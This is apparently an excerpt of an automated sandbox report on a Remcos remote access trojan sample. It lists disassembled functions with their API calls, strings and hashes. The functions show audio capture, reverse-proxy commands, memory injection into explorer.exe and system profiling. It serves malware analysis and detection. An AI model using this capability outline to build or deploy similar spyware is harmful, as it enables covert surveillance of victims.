                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 221034970-0
                                                                                                                                                                    • Opcode ID: 473fe38e9fe62b03c298370bf58436c411f5545c109614d9aefa1c7b0e78d094
                                                                                                                                                                    • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                                                                                                                                                    • Opcode Fuzzy Hash: 473fe38e9fe62b03c298370bf58436c411f5545c109614d9aefa1c7b0e78d094
                                                                                                                                                                    • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _free.LIBCMT ref: 00448135
                                                                                                                                                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                                                                                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                                                                                                    • _free.LIBCMT ref: 00448141
                                                                                                                                                                    • _free.LIBCMT ref: 0044814C
                                                                                                                                                                    • _free.LIBCMT ref: 00448157
                                                                                                                                                                    • _free.LIBCMT ref: 00448162
                                                                                                                                                                    • _free.LIBCMT ref: 0044816D
                                                                                                                                                                    • _free.LIBCMT ref: 00448178
                                                                                                                                                                    • _free.LIBCMT ref: 00448183
                                                                                                                                                                    • _free.LIBCMT ref: 0044818E
                                                                                                                                                                    • _free.LIBCMT ref: 0044819C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                    • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                                                                                                                    • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                                                                                                                                                    • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                                                                                                                    • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C59D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _free.LIBCMT ref: 274C59EA
                                                                                                                                                                      • Part of subcall function 274C571E: HeapFree.KERNEL32(00000000,00000000,?,274C924F,?,00000000,?,00000000,?,274C9276,?,00000007,?,?,274C7E5A,?), ref: 274C5734
                                                                                                                                                                      • Part of subcall function 274C571E: GetLastError.KERNEL32(?,?,274C924F,?,00000000,?,00000000,?,274C9276,?,00000007,?,?,274C7E5A,?,?), ref: 274C5746
                                                                                                                                                                    • _free.LIBCMT ref: 274C59F6
                                                                                                                                                                    • _free.LIBCMT ref: 274C5A01
                                                                                                                                                                    • _free.LIBCMT ref: 274C5A0C
                                                                                                                                                                    • _free.LIBCMT ref: 274C5A17
                                                                                                                                                                    • _free.LIBCMT ref: 274C5A22
                                                                                                                                                                    • _free.LIBCMT ref: 274C5A2D
                                                                                                                                                                    • _free.LIBCMT ref: 274C5A38
                                                                                                                                                                    • _free.LIBCMT ref: 274C5A43
                                                                                                                                                                    • _free.LIBCMT ref: 274C5A51
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                    • Opcode ID: 76c62a0642d295176bf9202000945cb1149dc660ef550f713a7cbcfc85cad3a5
                                                                                                                                                                    • Instruction ID: a3d70e86dc70b063a82475a39ab97090f75982b90340ea032f625d63f9008389
                                                                                                                                                                    • Opcode Fuzzy Hash: 76c62a0642d295176bf9202000945cb1149dc660ef550f713a7cbcfc85cad3a5
                                                                                                                                                                    • Instruction Fuzzy Hash: 1511D47E121158FFCB12EF54C842CDEBFA5EF54650F2540ADBA088B220DA32DB909B81
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Eventinet_ntoa
                                                                                                                                                                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                                                                                                                    • API String ID: 3578746661-3604713145
                                                                                                                                                                    • Opcode ID: aecfae973fcd95da2156a60fa499ef4ec17b3cf50ea654f8625baea4d8ad10fd
                                                                                                                                                                    • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                                                                                                                                                    • Opcode Fuzzy Hash: aecfae973fcd95da2156a60fa499ef4ec17b3cf50ea654f8625baea4d8ad10fd
                                                                                                                                                                    • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00455F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DecodePointer
                                                                                                                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                    • API String ID: 3527080286-3064271455
                                                                                                                                                                    • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                                                                                                                                    • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                                                                                                                                                    • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                                                                                                                                    • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                                                                                                                                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00417521
                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                                                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                                                    • API String ID: 1462127192-2001430897
                                                                                                                                                                    • Opcode ID: 4e98a883f5de8e771f1cae5692111312442e42041ead1ea9a16ca22d903c5249
                                                                                                                                                                    • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                                                                                                                                                    • Opcode Fuzzy Hash: 4e98a883f5de8e771f1cae5692111312442e42041ead1ea9a16ca22d903c5249
                                                                                                                                                                    • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Users\Public\Libraries\lhgtogaW.pif), ref: 0040749E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                    • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                                                                                                    • API String ID: 2050909247-4242073005
                                                                                                                                                                    • Opcode ID: 4409a7b6f76a06c48cb89125166c9e1f2e747661969edee93a923676ecaecbf9
                                                                                                                                                                    • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                                                                                                                                                    • Opcode Fuzzy Hash: 4409a7b6f76a06c48cb89125166c9e1f2e747661969edee93a923676ecaecbf9
                                                                                                                                                                    • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _strftime.LIBCMT ref: 00401D50
                                                                                                                                                                      • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                                                                                    • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                                                                                                                                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                                                                                                                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                                                    • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                                                                                                                    • API String ID: 3809562944-243156785
                                                                                                                                                                    • Opcode ID: 35a9233b13e1316c45cd8afc075edd62484678f1c63a43c95b202f337e4074f1
                                                                                                                                                                    • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                                                                                                                                                    • Opcode Fuzzy Hash: 35a9233b13e1316c45cd8afc075edd62484678f1c63a43c95b202f337e4074f1
                                                                                                                                                                    • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00410E61 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                                                                                                                                                    • int.LIBCPMT ref: 00410E81
                                                                                                                                                                      • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                                                                                                                                      • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00410F29
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                                                                                    • String ID: ,kG$0kG
                                                                                                                                                                    • API String ID: 3815856325-2015055088
                                                                                                                                                                    • Opcode ID: 104655b219d7360bbd62e7af1339e96782af3c0a0346709f02f53ac4a63324da
                                                                                                                                                                    • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                                                                                                                                                    • Opcode Fuzzy Hash: 104655b219d7360bbd62e7af1339e96782af3c0a0346709f02f53ac4a63324da
                                                                                                                                                                    • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                                                                                                                    • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                                                                                                                                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                                                                                                                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                                                                                                                    • waveInStart.WINMM ref: 00401CFE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                                                                    • String ID: dMG$|MG$PG
                                                                                                                                                                    • API String ID: 1356121797-532278878
                                                                                                                                                                    • Opcode ID: 4847331a3159101abd2f471b23cb9d67ee169c85da226fed21ec568aa636ce6b
                                                                                                                                                                    • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                                                                                                                                                    • Opcode Fuzzy Hash: 4847331a3159101abd2f471b23cb9d67ee169c85da226fed21ec568aa636ce6b
                                                                                                                                                                    • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                                                                                                                                                      • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                                                                                                                                                      • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                                                                                                                                                      • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                                                                                                                                                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                                                                                                                                                    • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                                                                                                                                                    • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0041D4E9
                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 0041D4F3
                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                                                    • String ID: Remcos
                                                                                                                                                                    • API String ID: 1970332568-165870891
                                                                                                                                                                    • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                                                                                                                    • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                                                                                                                                                    • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                                                                                                                    • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 7d049b86027effad8d92042d9403d5bfe2ea3e93186a839875c543696ca89538
                                                                                                                                                                    • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                                                                                                                                                    • Opcode Fuzzy Hash: 7d049b86027effad8d92042d9403d5bfe2ea3e93186a839875c543696ca89538
                                                                                                                                                                    • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00453D83 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCPInfo.KERNEL32(?,?), ref: 00453E2F
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453EB2
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00453EEA
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00453F45
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00453F94
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453F5C
                                                                                                                                                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00453FD8
                                                                                                                                                                    • __freea.LIBCMT ref: 00454003
                                                                                                                                                                    • __freea.LIBCMT ref: 0045400F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 201697637-0
                                                                                                                                                                    • Opcode ID: cb909bb237894310d835953ab4abccfeb7062077920a6df16ad3eaeca36fe885
                                                                                                                                                                    • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                                                                                                                                                    • Opcode Fuzzy Hash: cb909bb237894310d835953ab4abccfeb7062077920a6df16ad3eaeca36fe885
                                                                                                                                                                    • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C1CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 274C1D1B
                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 274C1D37
                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 274C1D4B
                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 274C1D58
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 274C1D72
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 274C1D7D
                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 274C1D8A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1454806937-0
                                                                                                                                                                    • Opcode ID: b31d2d8bc3e47cd173ed75cbcb7f458d59049e681e1375bed535a31dfc1b031a
                                                                                                                                                                    • Instruction ID: 1cfcb58182df0bb5fc0456f545c63a8c07c36263b8825b200984f9e77ba2486b
                                                                                                                                                                    • Opcode Fuzzy Hash: b31d2d8bc3e47cd173ed75cbcb7f458d59049e681e1375bed535a31dfc1b031a
                                                                                                                                                                    • Instruction Fuzzy Hash: 45214CB590121CEFE710DFA68C8DEEB76ACEB58748F00096DF511D2140DA789E868E70
